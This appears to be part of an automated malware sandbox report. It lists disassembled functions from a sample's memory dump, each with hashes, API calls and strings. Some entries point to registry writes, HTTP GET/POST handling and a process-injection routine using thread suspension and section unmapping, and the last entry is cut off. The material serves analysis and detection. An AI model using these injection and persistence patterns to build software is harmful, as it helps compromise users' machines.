Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE6E9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123 Total matches: 37
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
